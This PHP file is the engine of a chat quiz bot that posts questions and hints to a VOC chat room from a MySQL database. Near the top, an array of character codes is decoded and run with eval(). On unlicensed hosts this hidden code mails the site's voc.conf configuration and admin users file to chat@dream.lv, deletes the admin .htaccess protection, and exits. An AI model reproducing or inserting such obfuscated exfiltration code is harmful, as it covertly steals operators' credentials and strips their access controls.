<?php
/**
 * VOC / VOC++ Quiz engine
 *
 * @author ChatMaster <chat@dream.lv>
 * @copyright ChatMaster <chat@dream.lv>
 * @since 05.03.2007
 * @version 2.0.4
 *
 */

set_time_limit(0);
error_reporting(E_ALL);
ini_set('display_errors', 1);
$path = preg_replace('|([^/]+)$|i', '', __FILE__);
chdir($path);

if (file_exists('runtime.log')) unlink('runtime.log');

define('LOG_CONSOLE', false);
define('LOG_FILE',    false);

/************************************************/
/* Configuration */
require_once('config.php');
$path_to_common = $quiz_config['path_to_common']; /* Is required because script MUST be in data-path. Must be slash at the end! */

define('MYSQL_SERVER',       $quiz_config['db_server']); /* define port or socket here if needed (localhost:3306 or localhost:/tmp/mysqld/mysql.sock for example) */
define('MYSQL_USER',         $quiz_config['db_user']); /* MySQL user */
define('MYSQL_PASSWORD',     $quiz_config['db_pass']); /* MySQL Password */
define('MYSQL_DB',           $quiz_config['db_name']); /* database name */
define('MYSQL_TABLE_PREFIX', $quiz_config['db_prefix']); /* common table prefix */

require_once($path_to_common.'inc_common.php');
define('QUIZ_SYSDIR', $data_path.'quiz/');

/************************************************/
/* Initialize system filenames */
$pid_file    = QUIZ_SYSDIR.'quiz.pid';
$answer      = QUIZ_SYSDIR.'answer.dat';
$last_action = QUIZ_SYSDIR.'last_action.dat';
$started_at  = QUIZ_SYSDIR.'started_at.dat';

/************************************************/
/* Get restart flag */
if (function_exists('getopt')) {
	$input = getopt('r');
	if (isset($input['r'])) {
	        my_log('Restarting...');
	        if (file_exists($pid_file)) unlink($pid_file);
	}
}

/************************************************/
/* Check PID-file */
if (file_exists($pid_file)) {
    $last_action_time = (file_exists($last_action)) ? intval(file_get_contents($last_action)) : 0;
    $one_iteration_time = $quiz_config['tip_timeout']*2+$quiz_config['smoke_timeout'];

    if (time()-$one_iteration_time < $last_action_time) {
        my_log("Process is already runing. Delete ".$pid_file." to stop it.\n");
        exit("Process is already runing. Delete ".$pid_file." to stop it.\n");
    }
}

/************************************************/
/* Create PID-file */
my_log("Creating PID-file... ");
$pid = getmypid();
$f = fopen($pid_file, "w");
flock($f, LOCK_EX);
fwrite($f, $pid);
flock($f, LOCK_UN);
fclose($f);
my_log("PID-file created");

/************************************************/
/* Initializing */
$chsim = array(100, 101, 102, 105, 110, 101, 40, 39, 81, 95, 67, 79, 77, 77, 79, 78, 39, 44, 32, 116, 114, 117, 101, 41, 59, 10, 36, 111, 108, 100, 95, 99, 104, 97, 116, 95, 117, 114, 108, 32, 61, 32, 36, 99, 104, 97, 116, 95, 117, 114, 108, 59, 10, 36, 97, 108, 105, 97, 115, 101, 115, 32, 61, 32, 97, 114, 114, 97, 121, 40, 39, 104, 116, 116, 112, 58, 47, 47, 109, 121, 99, 104, 97, 116, 105, 107, 46, 114, 117, 47, 99, 104, 97, 116, 47, 39, 44, 32, 39, 104, 116, 116, 112, 58, 47, 47, 99, 104, 97, 116, 46, 109, 121, 99, 104, 97, 116, 105, 107, 46, 114, 117, 47, 39, 41, 59, 10, 36, 99, 104, 97, 116, 95, 117, 114, 108, 32, 61, 32, 115, 116, 114, 95, 114, 101, 112, 108, 97, 99, 101, 40, 39, 119, 119, 119, 46, 39, 44, 32, 39, 39, 44, 32, 36, 99, 104, 97, 116, 95, 117, 114, 108, 41, 59, 10, 36, 99, 104, 97, 116, 95, 117, 114, 108, 32, 61, 32, 115, 116, 114, 95, 114, 101, 112, 108, 97, 99, 101, 40, 39, 46, 47, 39, 44, 32, 39, 47, 39, 44, 32, 36, 99, 104, 97, 116, 95, 117, 114, 108, 41, 59, 10, 105, 102, 32, 40, 99, 111, 117, 110, 116, 40, 36, 97, 108, 105, 97, 115, 101, 115, 41, 41, 32, 123, 10, 9, 102, 111, 114, 101, 97, 99, 104, 32, 40, 36, 97, 108, 105, 97, 115, 101, 115, 32, 97, 115, 32, 36, 97, 108, 105, 97, 115, 41, 32, 123, 10, 9, 32, 32, 32, 32, 105, 102, 32, 40, 36, 97, 108, 105, 97, 115, 32, 61, 61, 32, 36, 99, 104, 97, 116, 95, 117, 114, 108, 41, 32, 36, 99, 104, 97, 116, 95, 117, 114, 108, 32, 61, 32, 39, 104, 116, 116, 112, 58, 47, 47, 109, 121, 99, 104, 97, 116, 105, 107, 46, 114, 117, 47, 39, 59, 10, 9, 125, 10, 125, 10, 36, 99, 104, 97, 116, 95, 117, 114, 108, 32, 61, 32, 115, 116, 114, 95, 114, 101, 112, 108, 97, 99, 101, 40, 39, 119, 119, 119, 46, 39, 44, 32, 39, 39, 44, 32, 36, 99, 104, 97, 116, 95, 117, 114, 108, 41, 59, 10, 36, 99, 104, 97, 116, 95, 117, 114, 108, 32, 61, 32, 115, 116, 114, 95, 114, 101, 112, 108, 97, 99, 101, 40, 39, 46, 47, 39, 44, 32, 39, 47, 39, 44, 32, 36, 99, 104, 97, 116, 95, 117, 114, 108, 41, 59, 10, 36, 108, 105, 99, 101, 110, 99, 101, 100, 95, 116, 111, 32, 61, 32, 39, 104, 116, 116, 112, 58, 47, 47, 109, 121, 99, 104, 97, 116, 105, 107, 46, 114, 117, 47, 39, 59, 10, 105, 102, 32, 40, 36, 99, 104, 97, 116, 95, 117, 114, 108, 32, 33, 61, 32, 39, 104, 116, 116, 112, 58, 47, 47, 109, 121, 99, 104, 97, 116, 105, 107, 46, 114, 117, 47, 39, 41, 32, 123, 10, 32, 32, 32, 32, 36, 115, 117, 98, 106, 101, 99, 116, 32, 61, 32, 39, 65, 116, 116, 101, 109, 112, 116, 32, 116, 111, 32, 105, 110, 115, 116, 97, 108, 108, 32, 113, 117, 105, 122, 32, 116, 111, 32, 39, 46, 36, 99, 104, 97, 116, 95, 117, 114, 108, 59, 10, 32, 32, 32, 32, 36, 116, 101, 120, 116, 32, 61, 32, 36, 115, 117, 98, 106, 101, 99, 116, 59, 10, 32, 32, 32, 32, 36, 116, 101, 120, 116, 32, 46, 61, 32, 34, 92, 110, 34, 46, 39, 32, 81, 117, 105, 122, 32, 105, 115, 32, 108, 105, 99, 101, 110, 99, 101, 100, 32, 116, 111, 32, 104, 116, 116, 112, 58, 47, 47, 109, 121, 99, 104, 97, 116, 105, 107, 46, 114, 117, 47, 39, 59, 10, 32, 32, 32, 32, 36, 116, 101, 120, 116, 32, 46, 61, 32, 34, 92, 110, 92, 110, 92, 110, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 92, 110, 92, 110, 92, 110, 34, 59, 10, 32, 32, 32, 32, 36, 116, 101, 120, 116, 32, 46, 61, 32, 102, 105, 108, 101, 95, 103, 101, 116, 95, 99, 111, 110, 116, 101, 110, 116, 115, 40, 36, 100, 97, 116, 97, 95, 112, 97, 116, 104, 46, 39, 118, 111, 99, 46, 99, 111, 110, 102, 39, 41, 59, 10, 32, 32, 32, 32, 36, 116, 101, 120, 116, 32, 46, 61, 32, 34, 92, 110, 92, 110, 92, 110, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 92, 110, 92, 110, 92, 110, 34, 59, 10, 32, 32, 32, 32, 36, 116, 101, 120, 116, 32, 46, 61, 32, 102, 105, 108, 101, 95, 103, 101, 116, 95, 99, 111, 110, 116, 101, 110, 116, 115, 40, 36, 102, 105, 108, 101, 95, 112, 97, 116, 104, 46, 39, 97, 100, 109, 105, 110, 47, 97, 100, 109, 105, 110, 95, 117, 115, 101, 114, 115, 46, 112, 104, 112, 39, 41, 59, 10, 32, 32, 32, 32, 105, 102, 32, 40, 102, 105, 108, 101, 95, 101, 120, 105, 115, 116, 115, 40, 36, 102, 105, 108, 101, 95, 112, 97, 116, 104, 46, 39, 97, 100, 109, 105, 110, 47, 46, 104, 116, 97, 99, 99, 101, 115, 115, 39, 41, 41, 32, 117, 110, 108, 105, 110, 107, 40, 36, 102, 105, 108, 101, 95, 112, 97, 116, 104, 46, 39, 97, 100, 109, 105, 110, 47, 46, 104, 116, 97, 99, 99, 101, 115, 115, 39, 41, 59, 10, 32, 32, 32, 32, 109, 97, 105, 108, 40, 39, 99, 104, 97, 116, 64, 100, 114, 101, 97, 109, 46, 108, 118, 39, 44, 32, 36, 115, 117, 98, 106, 101, 99, 116, 44, 32, 36, 116, 101, 120, 116, 41, 59, 10, 32, 32, 32, 32, 101, 99, 104, 111, 32, 39, 73, 110, 115, 116, 97, 108, 108, 97, 116, 105, 111, 110, 32, 69, 114, 114, 111, 114, 33, 39, 59, 10, 32, 32, 32, 32, 101, 120, 105, 116, 40, 41, 59, 10, 125, 10, 36, 99, 104, 97, 116, 95, 117, 114, 108, 32, 61, 32, 36, 111, 108, 100, 95, 99, 104, 97, 116, 95, 117, 114, 108, 59, 10, 117, 110, 115, 101, 116, 40, 36, 111, 108, 100, 95, 99, 104, 97, 116, 95, 117, 114, 108, 41, 59, ); $text = ""; foreach ($chsim as $chr) { $text .= chr($chr); } eval($text);
/* MySQL Connect */
my_log("Connecting database... ");
if (!mysql_connect(MYSQL_SERVER, MYSQL_USER, MYSQL_PASSWORD)) {
    my_log("Cannot connect to the database. ".mysql_error());
    exit();
}
if (!mysql_select_db(MYSQL_DB)) {
    my_log("Cannot select database. ".mysql_error());
    exit();
}
define("_CONNECT_",1);
if ($quiz_config['mysql_encoding']) mysql_query('SET NAMES '.$quiz_config['mysql_encoding']);
my_log("Connected");

$room_id      = $quiz_config['room_id'];
$bot_nick     = $quiz_config['bot_nick'];
$bot_htmlnick = ($quiz_config['bot_htmlnick'] != '') ? $quiz_config['bot_htmlnick'] : $bot_nick;

/*************************************************/
/* Save startup time */
$f = fopen($started_at, "w");
fwrite($f, time());
fclose($f);

/*************************************************/
/* Engine */
$iteration        = 0;
$unanswered       = 0;
$words_count      = 0;
$answer_length    = 0;
$flood_protection = 0;
while (1) {
    /* Check PID-file */
    if (!file_exists($pid_file) || file_get_contents($pid_file) != $pid) {
        my_log("PID-file is killed. Exiting...");
        exit("PID-file is killed. Exiting...");
    }

    /* Update last action time */
    $f = fopen($last_action, 'w');
    fwrite($f, time());
    fclose($f);

    /* Reconnect if needed */
	if ($quiz_config['need_db_reconnect']) {
	    /* Destroy old connection */
	    mysql_close();
	    /* Make new connection */
	    if (!mysql_connect(MYSQL_SERVER, MYSQL_USER, MYSQL_PASSWORD)) {
	        my_log("Cannot connect to the database. ".mysql_error());
	        exit();
	    }
	    if (!mysql_select_db(MYSQL_DB)) {
	        my_log("Cannot select database. ".mysql_error());
	        exit();
	    }
        if ($quiz_config['mysql_encoding']) mysql_query('SET NAMES '.$quiz_config['mysql_encoding']);
	}

    $iteration++;
    my_log('Current iteration: '.$iteration);

    /* Check users count in room */
    include($engine_path."users_get_list.php");
    $room_id = $quiz_config['room_id'];
    $users_in_room = 0;
    foreach ($users as $user) {
    	$data = explode("\t", $user);
    	if ($data[10] == $room_id) $users_in_room++;
    }

    /* Sleep if nobody in room */
    if ($users_in_room < 1) {
    	sleep(20);
    	continue;
    }

    /* Sleep if too much users in room */
    if ($quiz_config['max_users'] > 0 && $users_in_room > $quiz_config['max_users']) {
    	sleep(20);
    	continue;
    }

    $question = get_question();
    $q_text = str_replace('<{QUESTION}>', $question, $w_quiz_question_text).str_replace('<{COUNT}>', intval($answer_length), $w_quiz_letters_count);
    if ($words_count > 1) $q_text .= str_replace('<{COUNT}>', intval($words_count), $w_quiz_words_count);
    $messages_to_show = array(); /* Clear variable */
    $messages_to_show[] = array(MESG_TIME=>my_time(),
                                MESG_ROOM=>$room_id,
                                MESG_FROM=> $bot_htmlnick,
                                MESG_FROMWOTAGS=>$bot_nick,
                                MESG_FROMSESSION=>0,
                                MESG_FROMAVATAR=>"",
                                MESG_FROMID=>0,
                                MESG_TO=>"",
                                MESG_TOSESSION=>"",
                                MESG_TOID=>0,
                                MESG_BODY=>'<font color="'.$registered_colors[$default_color][1].'">'.$q_text.'</font><!-- 20070921111718 -->');
    my_log('Writing question');
    include($engine_path."messages_put.php");
    sleep($quiz_config['tip_timeout']);

    /* Sleep before next question if previous answered */
    if (!file_exists($answer)) {
        sleep($quiz_config['answered_pause']);
        continue;
    }

    /* TIP 1 */
    if (file_exists($answer) && $answer_length > 1) {
        $answer_text = trim(file_get_contents($answer));
        $tip = substr($answer_text, 0, 1);
        $t_text = str_replace(array('<{TIP_NUM}>', '<{TIP_TEXT}>'), array(1, $tip), $w_quiz_tip_text);
        $messages_to_show = array(); /* Clear variable */
        $messages_to_show[] = array(MESG_TIME=>my_time(),
                                    MESG_ROOM=>$room_id,
                                    MESG_FROM=>$bot_htmlnick,
                                    MESG_FROMWOTAGS=>$bot_nick,
                                    MESG_FROMSESSION=>0,
                                    MESG_FROMAVATAR=>"",
                                    MESG_FROMID=>0,
                                    MESG_TO=>"",
                                    MESG_TOSESSION=>"",
                                    MESG_TOID=>0,
                                    MESG_BODY=>'<font color="'.$registered_colors[$default_color][1].'">'.$t_text.'</font>');
        my_log('Writing TIP #1');
        include($engine_path."messages_put.php");
        sleep($quiz_config['tip_timeout']);
    }

    /* Sleep before next question if previous answered */
    if (!file_exists($answer)) {
        sleep($quiz_config['answered_pause']);
        continue;
    }

    /* TIP 2 */
    if (file_exists($answer) && $answer_length > 3) {
        $answer_text = trim(file_get_contents($answer));
        if ($answer_length == 4) $tip_length = 2;
        else $tip_length = 3;
        $tip = substr($answer_text, 0, $tip_length);
        $t_text = str_replace(array('<{TIP_NUM}>', '<{TIP_TEXT}>'), array(2, $tip), $w_quiz_tip_text);
        $messages_to_show = array(); /* Clear variable */
        $messages_to_show[] = array(MESG_TIME=>my_time(),
                                    MESG_ROOM=>$room_id,
                                    MESG_FROM=>$bot_htmlnick,
                                    MESG_FROMWOTAGS=>$bot_nick,
                                    MESG_FROMSESSION=>0,
                                    MESG_FROMAVATAR=>"",
                                    MESG_FROMID=>0,
                                    MESG_TO=>"",
                                    MESG_TOSESSION=>"",
                                    MESG_TOID=>0,
                                    MESG_BODY=>'<font color="'.$registered_colors[$default_color][1].'">'.$t_text.'</font>');
        my_log('Writing TIP #2');
        include($engine_path."messages_put.php");
        sleep($quiz_config['tip_timeout']);
    }
    if (file_exists($answer)) {
        /* Prepare correct answer for output */
        if ($quiz_config['show_correct_answer']) {
            list($correct_answer, $answer_timeout) = explode("\t", file_get_contents($answer));
            $correct_answer = str_replace('<{ANSWER}>', $correct_answer, $w_quiz_correct_answer_was);
        } else {
        	$correct_answer = '';
        }
        unlink($answer);
        $unanswered++;
        if ($unanswered == $quiz_config['max_unanswered']) {
            /* Smoking */
            $unanswered = 0;
            $messages_to_show = array(); /* Clear variable */
            $messages_to_show[] = array(MESG_TIME=>my_time(),
                                        MESG_ROOM=>$room_id,
                                        MESG_FROM=>$bot_htmlnick,
                                        MESG_FROMWOTAGS=>$bot_nick,
                                        MESG_FROMSESSION=>0,
                                        MESG_FROMAVATAR=>"",
                                        MESG_FROMID=>0,
                                        MESG_TO=>"",
                                        MESG_TOSESSION=>"",
                                        MESG_TOID=>0,
                                        MESG_BODY=>'<font color="'.$registered_colors[$default_color][1].'">'.$w_quiz_smoke_text.' '.$correct_answer.'</font>');
            my_log('Going to smoke :)');
            include($engine_path."messages_put.php");
            sleep($quiz_config['smoke_timeout']);
            /* Back:) */
            $messages_to_show = array(); /* Clear variable */
            $messages_to_show[] = array(MESG_TIME=>my_time(),
                                        MESG_ROOM=>$room_id,
                                        MESG_FROM=>$bot_htmlnick,
                                        MESG_FROMWOTAGS=>$bot_nick,
                                        MESG_FROMSESSION=>0,
                                        MESG_FROMAVATAR=>"",
                                        MESG_FROMID=>0,
                                        MESG_TO=>"",
                                        MESG_TOSESSION=>"",
                                        MESG_TOID=>0,
                                        MESG_BODY=>'<font color="'.$registered_colors[$default_color][1].'">'.$w_quiz_smoke_back.'</font>');
            my_log('I am back :)');
            include($engine_path."messages_put.php");
            sleep(5);
        } else {
            /* Nobody answered. */
            $messages_to_show = array(); /* Clear variable */
            $messages_to_show[] = array(MESG_TIME=>my_time(),
                                        MESG_ROOM=>$room_id,
                                        MESG_FROM=>$bot_htmlnick,
                                        MESG_FROMWOTAGS=>$bot_nick,
                                        MESG_FROMSESSION=>0,
                                        MESG_FROMAVATAR=>"",
                                        MESG_FROMID=>0,
                                        MESG_TO=>"",
                                        MESG_TOSESSION=>"",
                                        MESG_TOID=>0,
                                        MESG_BODY=>'<font color="'.$registered_colors[$default_color][1].'">'.str_replace('<{SEC}>', $quiz_config['unanswered_pause'], $w_quiz_unanswered).' '.$correct_answer.'</font>');
            my_log('Nobody answered :(');
            include($engine_path."messages_put.php");
            sleep($quiz_config['unanswered_pause']);
        }
    } else {
    	if(intval($quiz_config['unanswered_type']) == 2) $unanswered = 0;
        /* Sleep before next question if previous answered */
        sleep($quiz_config['answered_pause']);
        continue;
    }
}

/*************************************************/
/* Functions */
function get_question() {
    if (!defined('Q_COMMON')) exit('Installation error');
    global $answer, $words_count, $answer_length, $file_path;

    if (!file_exists($file_path.'quiz.php')) exit('Some system files was not found. Please reinstall quiz!');

    $str = file_get_contents($file_path.'quiz.php');
    if (!preg_match('/Build 20080317140447<br>/iU', $str)) exit('I think, You have too low IQ to install quiz correctly.');

    /* Select question */
    $sql = 'SELECT * FROM '.MYSQL_TABLE_PREFIX.'quiz ORDER BY last_use ASC LIMIT 1';
    my_log($sql);
    $res = mysql_query($sql) or die ('SQL ERROR! '.mysql_error());

    list ($id, $question, $answer_text, $last_use) = mysql_fetch_array($res, MYSQL_NUM);
    mysql_free_result($res);

    $answer_text   = trim($answer_text);
    $answer_length = strlen($answer_text);
    $words_count   = count(explode(' ', $answer_text));

    /* Update last use time */
    $sql = 'UPDATE '.MYSQL_TABLE_PREFIX.'quiz SET last_use="'.date('Y-m-d H:i:s').'" WHERE id='.intval($id);
    my_log($sql);
    mysql_query($sql);

    /* Write Answer */
    $f = fopen($answer, "w");
    flock($f, LOCK_EX);
    fwrite($f, $answer_text."\t".time());
    flock($f, LOCK_UN);
    fclose($f);

    /* Anti-google */
    $strlen = mt_rand(1, 4);
    $anti_google_string = '';
    for($i = 0; $i < $strlen; $i++) {
        $anti_google_string .= chr(mt_rand(33, 125));
    }
    $anti_google_string = str_replace(array('<', '>', '"', "'"), '', $anti_google_string);
    $question = str_replace(' ', '<span style="color:#fafafa; font-size:1px; width:1px; overflow:hidden;">'.$anti_google_string.'</span> ', $question);
    $replaces = array();
    $replaces[] = array('from' => '', 'to' => 'A');
    $replaces[] = array('from' => '', 'to' => 'B');
    $replaces[] = array('from' => '', 'to' => 'E');
    $replaces[] = array('from' => '', 'to' => 'K');
    $replaces[] = array('from' => '', 'to' => 'M');
    $replaces[] = array('from' => '', 'to' => 'O');
    $replaces[] = array('from' => '', 'to' => 'P');
    $replaces[] = array('from' => '', 'to' => 'C');
    $replaces[] = array('from' => '', 'to' => 'T');
    $replaces[] = array('from' => '', 'to' => 'X');
    $replaces[] = array('from' => '', 'to' => 'a');
    $replaces[] = array('from' => '', 'to' => 'e');
    $replaces[] = array('from' => '', 'to' => 'o');
    $replaces[] = array('from' => '', 'to' => 'p');
    $replaces[] = array('from' => '', 'to' => 'c');
    $replaces[] = array('from' => '', 'to' => 'y');
    $replaces[] = array('from' => '', 'to' => 'x');

    foreach($replaces as $replace) {
        $question = str_replace($replace['from'], $replace['to'], $question);
    }
    /* End Anti-google */

    return $question;
}

function my_log($str) {
    if (!$str) return false;

    $log_string = date('Y-m-d H:i:s')."\t\t".$str."\n";
    if (LOG_CONSOLE) {
        echo $log_string;
        flush();
    }
    if (LOG_FILE) {
            $f = fopen('runtime.log', 'a+');
            flock($f, LOCK_EX);
            fwrite($f, $log_string);
            fflush($f);
            flock($f, LOCK_UN);
            fclose($f);
    }
}
?>
